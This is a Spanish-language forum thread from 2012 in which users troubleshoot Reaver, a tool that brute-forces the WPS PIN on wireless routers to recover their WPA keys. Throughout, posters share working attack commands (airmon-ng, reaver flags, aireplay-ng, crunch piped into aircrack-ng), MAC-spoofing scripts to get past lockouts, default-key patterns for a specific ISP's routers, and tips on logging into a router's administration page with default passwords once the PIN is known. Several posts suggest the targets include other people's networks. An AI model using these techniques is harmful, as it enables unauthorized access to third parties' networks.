  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 12345670
  • [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3

Como véis, los canales se van alternando.

Así que tanto si pruebo a meterle un canal:
# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c X
como si pruebo a fijarla:
# reaver -i mon0 -b XX:XX:XX:XX:XX:XX --fixed
el mensaje es, para ambos, el siguiente:

  • Waiting for beacon from XX:XX:XX:XX:XX:XX
  • Associated with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
  • [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    (...)

    Si a alguien supiese a que se debe este fallo en la asociación, agredecería que me diesen respuestas.

    Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Febrero 2012, 04:10 am
buenas, les dejo para los que tengan ubuntu o debian que trabajan con archivos .deb, los deb de Reaver v1.4:

(http://www.theprojectxblog.net/wp-content/uploads/2011/12/reavercracker.png)

--> Reaver-1.4.deb (http://repository.airubuntu.comuf.com/pool/testing/reaver_1.4-0_i386.deb)



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Pablo Videla en 7 Febrero 2012, 14:20 pm
Yo he tenido varias dudas respecto a esto y jamás lo he hecho, pero ahora que esta mas "producida" la cosa, tengo las siguientes consultas:

Estas vulnerabilidades depende del router, o de la compañia de ISP ? es valido para todos los paises? porque jamas he visto esas redes aca en Chile, me gustaría que me aclararan eso, gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: raimangsxr en 7 Febrero 2012, 20:45 pm
Trasteando me he dado cuenta que en W7 se puede saber si un AP tiene WPS activado simplemente pulsando conectar  :silbar:

¿O estoy equivocado? Lo digo para evitarse lo del Etherreal/Wireshark

http://imageshack.us/photo/my-images/845/sinttulowqz.png/ (http://imageshack.us/photo/my-images/845/sinttulowqz.png/)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: raimangsxr en 9 Febrero 2012, 09:33 am
Me pasa exactamente como a Lenna, obtengo:

[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)

Y no hay manera.

Utilizo awus036h/rtl8187L y la señal es de -30 en el airodump-ng supongo que es más que suficiente.

¿Alguna idea de porque no se asocia?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: raimangsxr en 9 Febrero 2012, 12:42 pm
Solucionado el problema de asociación que tenía.

Simplemente me descargado la ultima versión del repositorio de svn de reaver en mi ubuntu 11.04

Esto es una dependencia necesaria:
sudo apt-get install libsqlite3-dev

Descargamos la ultima versión de reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver

Lo instalamos => ./configure, make install y make

Lo utilizamos => ./reaver -i mon0 -b bssid -vv

Y ha fucionado sin problemas. Esos son los pasos que yo he seguido.

NOTA: en algun paso si os falla utilizad "sudo" para ejecutalo. No recuerdo cual era pero creo que make install fallaba y era necesario ejecutarlo como sudo make install.

Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Danistov en 11 Febrero 2012, 01:33 am
tengo el tipico comtrend de telefonica (64:68:0c...)y hay un boton pequeño delante que pone wps, pero no se si eso significa que me pueden piratear pq no se si esta "activo"
no he entendido muy bien para que sirve, ¿para permitir la entrada a un dispostivo se supone que hay que darle al botoncito?

ahora mismo estoy usando mi wifi sin tener que darle al boton ni asociarlo con ningun pin,

pongo una captura de mi router
http://www.subirimagenes.com/otros-comtrend-7424064.html

como vereis tengo checkeado dnd pone pin, pero lo tengo vacio, eso significa que si pongo un numero cuando me conecte tendre que escribirlo tambien desde mi gestor de conexion? me pueden piratear?

a ver si alguien me orienta un poco, que estoy liao xDD

saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Danistov en 11 Febrero 2012, 01:56 am
.....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Danistov en 11 Febrero 2012, 03:11 am
......


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 11 Febrero 2012, 14:59 pm
Ums, es interesante la aplicación. Pero tengo unas dudas, ¿para asociarse al AP con WPS no se necesita pulsar un botón de asociación que contiene el router?.
Lo digo porque poseo un Livebox 2 y ese router trae el WPS activado por defecto (historia que desactive desde el primer dia porque yo veia que con la clave que te dá, 8 digitos sin alternacion de ningun otro caracter, algo se podria hacer..)  :rolleyes:

Tambien añado, que el RT3070 tambien es compatible en la ultima versión. Lo he leido en seguridadwireless.
Pronto os digo que tal rula cuando lo pruebe con ese chip  :) . Me habia asustado al leerlo, a lo primero, que mi cacharro de 1W no sirviera. Pero bueno, yo plenamente os confirmo.
Lo probare tambien con un AR9271 que tengo suelto por casa.
Y os dejo datos .

Bueno, un saludo chicos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 11 Febrero 2012, 17:31 pm
Os cuento mi experiencia con reaver 1.4 que incluye el WW 3.4, tenia 2 tarjetas wifi antiguas una rt73usb y otra ath5k, con las dos me daba mas errores que ni se, saltaba un pin y me salia una parrafada error 2x15, no hay nose que, y por supuesto el 0x02 y 0x03 de wps failure,
compre ayer un usb wifi con boton wps y todo, no es que haga nada pero la mayoria de los fallos ya no me les saca, solo el de 0x02 y 0x03 que he mirao por todo internet y ademas de comandos con --no-nacks y -d 15 pero en esta ocasion siguen saliendo los errores,
asi que llevo 20 horas con algo mas del 20% y me voy a morir del asco esperando,

igual alguien me puede ayudar a agilizarlo,
comandos
1.macchanger -m 00:11:22:33:44:55 wlan0
2.airmon-ng start wlan0
3.airodump-ng mon0
4.reaver -i mon0 -b macap -N(nonacks) -d(he probado varias cantidades) -c canal -vv
en el -d cambiando en alguna va mas rapido y se me desconecta menos,

yo veo que a algunos os va mas rapido y no os sale tantas cosas
a mi me pone trying pin xxxxxxxxx
luego sending y reciving, luego los m1 y si va bien el nack wps, pero casi nunca lo hace todo seguido, de vez en cuando se desconecta y pone lo de WARNING, no associate o el error 0x02 y ala a repetir 4 veces o mas,
teneis algun consejo, el router es un netgear de ono A0:21:7b:xx:xx:xx y mi tarjeta una rt2800 o 3070,

gracias un saludo, por la anti eterna espera, y q no se me salten los plomos q lo fliparia, aunque de vez en cuando lo guardo pero prefiero no probar


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 12 Febrero 2012, 13:47 pm
Bueno, como dije probe con mi RT3070 en BT5R1 con un Livebox2 que tengo de mi operador. Os aclaro, que en otros routers quizas no, pero en este creo que tiene proteccion contra fuerza bruta para este tipo de ataques.
Despues de un rato de intentos con varios PINs erroneos, rapidos y constantes, y relanzarlo porque se quedo estancado, la respuesta es esta. (Recalco que tambien me salia esto al rato de varios intentos aun sin todavía relanzarlo.)

Edito: Los routers que poseen un boton para la asociación WPS, son mas dificiles al ataque. Puesto que para asociarse necesita el pulsar ese boton. (Habitualmente), pero esos routers tampoco son excluidos.
Caso dado como mi Livebox2.


Los que quieran hacer pruebas en sus routers desde BT5R1, tan solo para instalarlo teneis que hacer un apt-get install reaver.
Se os instalará la ultima versión de Reaver y de wash.
Un saludo  



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mochiloplatano en 12 Febrero 2012, 17:43 pm
Hola, he probado el reaver por primera vez y me ha sacado el WPS PIN de ONOXXXX tras unas horas, pero la clave WPA no  :-( (antes he mirado con el wireshark que tenia puesto microsoft wps y estaba en 0x02 pero sólo me ha sacado el pin wps) es eso normal? :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 13 Febrero 2012, 00:28 am
Mochiloplatano, una vez dentro... Si te las ingenias un poco e investigas en tu router  :¬¬ , lo demas esta casi mascadito.
Con permiso de un amigo, para ser exactos mi compadre que vive en frente, le he propuesto la idea y he probado con su router tambien, es una ONOXXXX , pero tambien me chapó.  :(
No se que error me dió pero mañana os cuento.
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 13 Febrero 2012, 00:36 am
Me pasa lo mismo que a mochiloplatano,podeis decirme como entrar en la configuracion del router solo con el pin? :¬¬ la wpa ya la busco yo  :xD

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 13 Febrero 2012, 01:14 am
En teoria si tienes el PIN del WPS y puedes acceder a la red conectandote a ella con dicho PIN. Simplemente seria entrar al propio router con la puerta de enlace (con suerte si recordais la contraseña por defecto del router.... ya me entendeis)  :silbar: Hay muchos datos sobre cada router en el grandioso google.. Hablo de contraseñas por defecto de ellos.
Probad lo que os digo haber... Tengo un router con asociacion WPS.. Pero siempre lo vi como una porqueria y no le e dado nunca uso.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 13 Febrero 2012, 11:13 am
es todo un mundo lo de los routers estos, yo tambien tengo el pin, ahora solo tengo que saber como me conecto, aveces si que me ha salido en alguna otra red lo de meter wpa o pin wps pero esta no sale desde ningun lao,
y eso que mi tarjeta usb tiene boton wps pero le doy y pasa un angel pero no me sale ninguna opcion mas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 13 Febrero 2012, 11:19 am
de todas formas para las redes ono A0:21:b7:xx:xx:xx he encontrado otro tio q ha puesto que la contraseña se parece mucho al pin, en su caso quedaria asi

pin wps   634xxxxx
wpa        y634xxxxxy
pudiendo ser las x el resto del pin identico por lo que con bastante paciencia se podria probar los 100 casos y haber


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Febrero 2012, 12:27 pm
de todas formas para las redes ono A0:21:b7:xx:xx:xx he encontrado otro tio q ha puesto que la contraseña se parece mucho al pin, en su caso quedaria asi

pin wps   634xxxxx
wpa        y634xxxxxy
pudiendo ser las x el resto del pin identico por lo que con bastante paciencia se podria probar los 100 casos y haber

si tiene wpa por defecto usa todo el pin:

Pin         12345678
WPA2:AZ12345678P

NOTA: los datos anteriores son inventados.

Por ende ni no nos da la WPA, podemos usa Crunch y hacer que corra los dígitos que nos faltan, tardaría menos de 1 hora.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 13 Febrero 2012, 12:52 pm
son 10 digitos la contraseña de onoxxxx wpa2,
por lo que si el pin son 8 digitos nos faltarian 2 digitos numéricos, corregidme si me equivoco, asi que estos son los posibles casos:

a./ A12345678B
b./AB12345678
c./12345678AB
d./ intercalados,
que mejor no sea asi o seria mucho mas complicado,
yo he probado ya el A12345678B y no ha salido por eso preguntaba

Aun asi iriamos al crunch y le podriamos decir que nos hiciese un diccionario en el que hubiera un 1, un 2.... asi con los 8 numeros y que los otros dos probase y aun asi no creo que tardara mas de 5 o 6 horas, es todo un suponer ya que no he probao nunca el crunch


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 13 Febrero 2012, 12:59 pm
El problema de que no den la wpa estos router es sencillo y es que aunque tienen wps NO esta activado, tienen boton y necesitan darlo para que en dos minutos lo enlaces, metodo parecido al bluetooth,pero si no lo enlazas aunque reaver sea capaz de sacarle el pin no te dará la clave wpa y si ya encima no es la clave por defecto apaga y vamonos

De todas formas si alguien tiene mas informacion o datos de pin, wpa de ono 4x se lo agradeceria un monton, jamas me he volcado tanto en esto de la seguridad wifi


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 13 Febrero 2012, 13:50 pm
si tiene wpa por defecto usa todo el pin:

Pin         12345678
WPA2:AZ12345678P

NOTA: los datos anteriores son inventados.

Por ende ni no nos da la WPA, podemos usa Crunch y hacer que corra los dígitos que nos faltan, tardaría menos de 1 hora.
Gracias por la info,no sabia de crunch,donde puedo bajarlo para Ubuntu 11.10? Gracias,saludos!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Febrero 2012, 14:26 pm
Gracias por la info,no sabia de crunch,donde puedo bajarlo para Ubuntu 11.10? Gracias,saludos!!

raro que no lo conozcas, para los que no tenemos rígido lanzamos:

Código:
crunch | Aircrack-ng

y nos ahorramos el hacer el diccionario. También podes usar John:

Código:
john | Aircrack-ng

pero con el crunch podes decirle que rellene las X

XX12345678X

lo descargas de aca:
https://sourceforge.net/projects/crunch-wordlist/files/ (https://sourceforge.net/projects/crunch-wordlist/files/)

Código:
tar -xvzf crunch*.tgz
cd crunch
apt-get install build-essential
make
make install
cp crunch /usr/sbin/
cp crunch /usr/bin/
cp crunch /usr/local/bin/


ejemplo:

Código
  1. crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mochiloplatano en 13 Febrero 2012, 15:43 pm
Información para el que le interese en ONOXXXX con wpa2-psk con reaver

WPS PIN: 123456789
WPA KEY: X1234567XX

repite casi todo menos el principio y el final



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 13 Febrero 2012, 15:50 pm
Información para el que le interese en ONOXXXX con wpa2-psk con reaver

WPS PIN: 123456789
WPA KEY: X1234567XX

repite casi todo menos el principio y el final



Muchas gracias,no sabes la wpa key completa por defecto? Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 13 Febrero 2012, 15:55 pm
Información para el que le interese en ONOXXXX con wpa2-psk con reaver

WPS PIN: 123456789
WPA KEY: X1234567XX

repite casi todo menos el principio y el final


Muchas gracias
habia leido en otro post que aunque repite 7 caracteres pueden estar desordenados, nose voy a meter con el handshake y el crunch haber si me rellena las x, pero si no coinciden las posiciones no se que hacer.

Gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Febrero 2012, 23:03 pm
Muchas gracias
habia leido en otro post que aunque repite 7 caracteres pueden estar desordenados, nose voy a meter con el handshake y el crunch haber si me rellena las x, pero si no coinciden las posiciones no se que hacer.

Gracias

bueno eso dependería del router. Igual le falta pulido al Reaver, hace más de tres días que estoy crackeando... y va a 20% recién..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 14 Febrero 2012, 16:08 pm
Tengo otra pregunta sobre el reaver:

¿Hay alguna forma de que empieze la busqueda de el pin a partir del 6000xxxx,
lo digo porque un dia perdi lo que habia guardado en el 6000 y pico asi por lo menos ya tenia el 50%


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Danistov en 14 Febrero 2012, 23:30 pm
cuando sale esto:

Sending identity response
Received identity request
Sending identity response
Received identity request
Sending identity response..

hay que esperar? o pararlo un rato y continuar despues...?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 16 Febrero 2012, 19:33 pm
Tengo otra pregunta sobre el reaver:

¿Hay alguna forma de que empieze la busqueda de el pin a partir del 6000xxxx,
lo digo porque un dia perdi lo que habia guardado en el 6000 y pico asi por lo menos ya tenia el 50%

Código:
--pin=XXXXXXXX

y podes especificar entre 4 o 8 dígitos para que empiece.

cuando sale esto:

Sending identity response
Received identity request
Sending identity response
Received identity request
Sending identity response..

hay que esperar? o pararlo un rato y continuar despues...?

depende, todos los routers tienen WPS diferentes por mas que sea 1.0 o 2.0 estos tienen barios métodos de seguridad, te doy un ejemplo de uno que tengo yo, la MAC es C8:64:C7 si mal no recuerdo, es in violable, pueba 10 pines y se bloquea, tenes que esperar 24 hs hasta que sigue con otros 10. Muy pero muy feo. Por eso dije:

Igual le falta pulido al Reaver, hace más de tres días que estoy crackeando... y va a 20% recién..

y sigo, hace ya 6 o 7 dias, les doy un ejemplo, crackear una WPA numérica de 8 digitos de longitud, tenes del 00000000 a 99999999, unas 100.000.000 key/s, un micro normal crackea a 256key/s tardarías un promedio de 4 días pero vos fíjate esto, el reaver, en mi caso prueba solamente 1 pin por minuto, osea prueba 5 pines y tiene que esperar 5 minutos... cuanto me falta...

igual reaver si es que no se dieron cuenta trabaja con una base de datos con pines que se saben que son usados, ejemplo el 12345670, es el primero que prueba. Que feo seria que empiece del 00000000 no llegas mas al 12345670 jeje al ritmo que va este router.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 17 Febrero 2012, 20:06 pm
Es un poco absurdo... E inutil, la idea que pienso. Porque poca gente legitima se asocia por WPS conociendo la clave WPA.. Pero, si hubiera alguna herramienta para capturar un paquete de datos con una asociación WPS legitima... (en plan handsake, añadir algun módulo o algo a airodump para que reconozca una asociación por WPS...)
¿No podriamos despues sacarla pasando alguna herramienta que acelerara el proceso?, en plan pyrit, EWSA.
Tengamos en cuenta que probando varias asociaciones directamente al router sin conocer el PIN tiene muchos inconvenientes... Limitaciones de intentos.. Velocidad de asociaciones limitadas por el router etc.
Si consiguieramos una captura que contega el PIN y despues sacarlo a fuerza dura y pura de CPU/GPU, tal y como esta el panorama en ese campo de las GPUs (Cuda y ATI Stream), sacar una clave de 8 caracteres sin letras, seria cuestión de minutos con una CPU o GPU decente.
¿Creeis que sería posible?, corregidme si me equivoco, solo es una suposición lo de capturar una asociación WPS. No conozco tecnicamente como funciona.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 17 Febrero 2012, 20:38 pm
Es un poco absurdo... E inutil, la idea que pienso. Porque poca gente legitima se asocia por WPS conociendo la clave WPA.. Pero, si hubiera alguna herramienta para capturar un paquete de datos con una asociación WPS legitima... (en plan handsake, añadir algun módulo o algo a airodump para que reconozca una asociación por WPS...)
¿No podriamos despues sacarla pasando alguna herramienta que acelerara el proceso?, en plan pyrit, EWSA.
Tengamos en cuenta que probando varias asociaciones directamente al router sin conocer el PIN tiene muchos inconvenientes... Limitaciones de intentos.. Velocidad de asociaciones limitadas por el router etc.
Si consiguieramos una captura que contega el PIN y despues sacarlo a fuerza dura y pura de CPU/GPU, tal y como esta el panorama en ese campo de las GPUs (Cuda y ATI Stream), sacar una clave de 8 caracteres sin letras, seria cuestión de minutos con una CPU o GPU decente.
¿Creeis que sería posible?, corregidme si me equivoco, solo es una suposición lo de capturar una asociación WPS. No conozco tecnicamente como funciona.


Puede ser una locura pero quizás sea posible, miren esto, el otro día vi un router con WPS, entonces digo bueno vamos a tirar suerte.. como siempre se hace al momento de hacer fuerza bruta.

MAC Address: C8:64:C7:XX:XX:XX
Cifrado: WPA2/AES
WPS: 1.0

comenzó a crackear no, probo 1, 2, 6, 10, bank! se bloqueo, bueno pienso que se desbloqueara en uno minutos, no, fueron horas, tardo 24 horas en volver a probar tan solo unos 10 pines y se volvió a bloquear.

según se es un zte corporation por la MAC osea pero probar 10 pines cada 24 horas no es una solución razonable, quizás tardar 20999 años en crackear la WPA seria mas fácil.

Ahora, nosotros no estamos usando una versión estable de reaver, por mas que tengamos la r112. Existe una versión PRO con una base de datos de pines mejorada que vende esta empresa que realizo al Reaver. O quizás esa versión de Reaver PRO tenga mejor funcionamiento.

Encontré navegando por los errores y preguntas en el sitio de Google Code que hay gente que le lanza el aireplay-ng contra el router, si les funciona simplemente tuvieron suerte.

A su ves también agregar que si hubiera algo que pare a estos bloqueos también aliviaría el crackeo, probé con todas las funciones del reaver y una es peor que la otra, la única que funciona bien es usando MAC y SSID y -vv nada más.

Se dice que el creador de Aircrack esta trabajando en algo pero mucho no le gusto la idea del WPS según el foro de AirCrack.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Febrero 2012, 14:31 pm
Yo relato absurdo mi idea por el hecho de que ningun cliente suele asociarse a su router por WPS teniendo su clave WPA.  :(
Mucha gente creo que desconoce esa tecnologia, por el hecho de que son nuevos, no tienen conocimiento sobre el asunto...
Quizas dentro de un tiempo tenga mas salida su uso.
Tambien tener que levantarte al salon mismo pa pulsar un botoncito, es mas costoso que poner una WPA de 16 caracteres por ejemplo, que no te mueves del sitio. (En el caso de que tenga botón y la peña sea tan vaga como yo)  :laugh:
El problema que nos limita el intentarlo directamente con reaver son las medidas de seguridad que toma el router cuando no son asociaciones legitimas.
Como tu caso, que a los 10 intentos chapa y no arranca hasta las 24 horas.
Con un paquete de asociacion por WPS y una GPU medianamente decente, eso seria cuestión de minutos, se la comeria con patatas.
Ums, ¿que ataques con aireplay-ng usaban?, leistes algo sobre alguno en concreto...
Buscaré mas info sobre el tema. Si el creador de la suite esta en el asunto, añadir un modulo a airodump-ng para reconocer la asociacion WPS y capturarla, seria una brecha muy grande para romperlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Febrero 2012, 18:04 pm
Bueno. Como siempre mis ambiciones, llevan ha intentar cumplir mis disparatados planes  :rolleyes:

Asi que cuelgo datos sobre mi plan magistral de supuestamente recreado como sería capturar una asociación WPS y atacarla por fuerza bruta pura y dura.

Cabe destacar que he hecho todo lo posible disponiendo de un PC cacoso, arcaico, y una GPU que a lo mejor un dia le da un calenton y explota, pero bueno empezemos la delicatese  :xD

Al dia de hoy, he cambiado la clave de mi red, por una de 8 digitos numericos sin ningun caracter especial (al igual de como funciona WPS).

Haciendo una desauthenticación, he capturado un handshake de mi propia red con la nueva clave, de aqui en adelante lo llamaremos "PIN", como corresponde a las caracteristicas recreadas de una asociación por WPS.
Vuelvo a destacar que es una recreación, al dia de hoy no exite tal herramienta para capturar tal asociación WPS como si de un handshake se tratase. Lo dejo claro por no crear dudas.

El resultado a la pesca es este.
Adjunto imagen:
(http://img138.imageshack.us/img138/2372/ewsa.png)
Utilizando una de las ultimas versiónes de EWSA.
De equipo cacoso:
Intel Core 2 Duo E2200 @ 2,2 Ghz (podia haberlo subido a 3 Ghz, que es como lo tengo OC aveces, pero seguro que no sería mucha diferencia.)
GPU GeForce 8400 GS (si, es patetico... Pero probaré dentro de poco con una GTS450 OC, que tengo pensado pillarme, digo yo que variará la cosa bastante.)
2GB de RAM DDR2.

El resultado son de média 200keys/x seg, con algun subidón a 300. La clave esta en el diccionario que he utilizado, una de las finales.
Tiempo estimado para concluir el diccionario y obtener aproximadamente el PIN sería: 358dias, 16 horas, 54 min y 21 seg aprox. (como bien dice la imagen.)
Realmente una locura. Animo a la gente, a intentar recrearlo, que disponga de un equipo con un rendimiento decente, o actual. Equipos de media/alta gama.
El cambio tiene que ser brutal.
Lo volveré a intentar, cuando haga algunas modificaciones, tengo pensado poner GPU GTS450 OC, otro módulo de 2GB de RAM, y si pillo alguno barato, pillar un Q6600 o cosa así. Si no se puede pues subiré las frecuencias hasta el limite del E2200. :-\

Por poder se puede, con algo medianamente util, se puede. Y en poco tiempo. Haber si es posible esa idea de la captura de la asociación WPS.

Bueno, un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 18 Febrero 2012, 19:25 pm
358dias, 16 horas, 54 min y 21 seg aprox. (como bien dice la imagen.)
Realmente una locura. Animo a la gente, a intentar recrearlo, que disponga de un equipo con un rendimiento decente, o actual. Equipos de media/alta gama.
El cambio tiene que ser brutal.

mito eso por usar windows, yo paso diccionarios de 8 dígitos numérico de 00000000-99999999 en 4 días con una maquina mas pobre y eso que lo estoy generando con el crunch; no hay ningun archivo lógico de diccionario.

(http://picturestack.com/589/463/C7AwpakLB.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 18 Febrero 2012, 19:30 pm
lo peor que el reaver llega un momento que hace colapsar al router, ha desaparecido por unas 10 horas... pero llegar a 100% y q me diga algo, sino llueven mensajes contra este  :¬¬

mas bien habria que encontrar alguna forma de burlar al router, onda de cambiar el tiempo entre pin y pin ya que he probado algunos comandos pero sigue haciéndolo a su velocidad normal.

Citar
I'm using ALfa rtl8187. reaver 1.4

found this way to make it work

1. run: aireplay-ng mon0 -1 120 -a (MACADDRESS) -e (SSID)
2. then: reaver -i mon0 -A -b (MACADDRESS) -c 6 -vv --no-nacks --win7

hope this help ;)

por todos lados lo puso.
http://code.google.com/p/reaver-wps/issues/detail?id=230

también están los Mx o M4, etc. Cuando uno capa el M6 se saben los primeros 4 dígitos del PIN, salta al 90% el reaver.

------------------------------------------------------------------------------------

por algo también agregue en WPSCrackGUI una base de datos, ejemplo si sabes los primeros 4, te faltan solo 4 y así se crackearia mas fácilmente especificando estos pines.

(http://picturestack.com/131/641/u54dbvl9.png)

Mejor 104=10.000 que 108=100.000.000.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Febrero 2012, 20:35 pm
Ums, eso de que puede ser por Windows, te doy la razón, y me tenta. Probare con el mismo handshake en pyrit. Nunca lo he usado pero por probar cosas nuevas :rolleyes: .
No se, el router parece ser que lo tiene muy bien controlado. Probé con el mio que tiene WPS, se comió los 10 primeros, y ya petó. Al dia siguiente probé y seguia petado :S, ni arrancaba como cuando los 10 primeros. Lo que no he probado por ejemplo, es intentarlo, petarme a los 10, hacer un spoof de la MAC y volverlo a intentar, a lo mejor cuela... Lo tengo que intentar. A no ser que el WPS directamente bloquee todas las asociaciones que le lleguen si algun cliente introduce varias erroneas.
Ums, tengo un rato para seguir experimentando.

Usan una asociación y luego pasan reaver, es muy raro. Lo probaré, pero me huele a que la cosa no cambiará nada.

Yo aún no le hice funcionar ni medio decente, y he probado con mi router y con otro, que tiene un ONOXXXX.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 18 Febrero 2012, 21:45 pm
yo probe cambiando la MAC por la del router, reaver no iniciaba, cambiando por la de algún usuario tampoco cambio en nada, si hay veces que cuando se bloquea ejemplo, cambias la mac y podes probar alguno mas, pero seria cambiar mac cada ves q este se bloquea, aproximadamente, 5 cambios por hora pero no siempre funciona.

en Wikipedia EN, explica como funciona, segun parece es imposible pensar un handshake:

Citar
Protocol  The WPS protocol consists as a series of EAP message exchanges that are triggered by a user action and relies on an exchange of descriptive information that should precede that user's action. The descriptive information is transferred through a new Information Element (IE) that is added to the beacon, probe response and optionally to the probe request and association request/response messages. Other than purely informative Type-length-values, those IEs will also hold the possible, and the currently deployed, configuration methods of the device. After the identification of the device's capabilities on both ends, a human trigger is used to initiate the actual session of the protocol. The session consists of 8 messages that are followed, in the case of a successful session, by a message to indicate the protocol is done. The exact stream of messages may change when configuring different kinds of devices (AP or STA) or using different physical media (wired or wireless).x


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Febrero 2012, 23:47 pm
¿No te funciona con el MAC spoof?. Leí esto en la wiki del reaver.

Código:
MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Es más, en muchos sitios recomiendan el spoof, puesto que el ataque por WPS es detectable. Tambien es cierto que si hay que hacer un spoof cada pocos X intentos, la cosa cambia y deja de ser algo viable.
Esto empieza a ser una movida muy rara.. A cada cual le vá como quiere.  :-[
Mañana por la mañana aré pruebas con el asunto y te comento, ya tengo echado el ojo a unos cuantos con WPS ON.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: psych0tyck en 19 Febrero 2012, 01:25 am
Les Cuento mi experiencia con reaver: empeze el Lunes a sacar una clave me demore 3 dias, termine el miercoles en la noche.. el resultado?
(http://k21.kn3.net/13A5F50B0.png)
http://k21.kn3.net/13A5F50B0.png
Ahora estoy desde el jueves tratando de sacar otra clave pero llevo 1.04% en tres dias bueno hasta hace 10 minutos 0,78% pero leyendo los comments probe cambiando la mac y me funciono me acepta 12 request y aparece esto
Código:
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
Pero ya es un avanze a que me tire todo el rato el mismo error
Tambien cree un script para que me cambie la mac y inicie reaver
Código:
#!bin/sh
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up

reaver -i mon0 -b 00:1D:XX:XX:XX:XX -vv
Saludos!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Febrero 2012, 17:50 pm
¿No te funciona con el MAC spoof?. Leí esto en la wiki del reaver.

Código:
MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

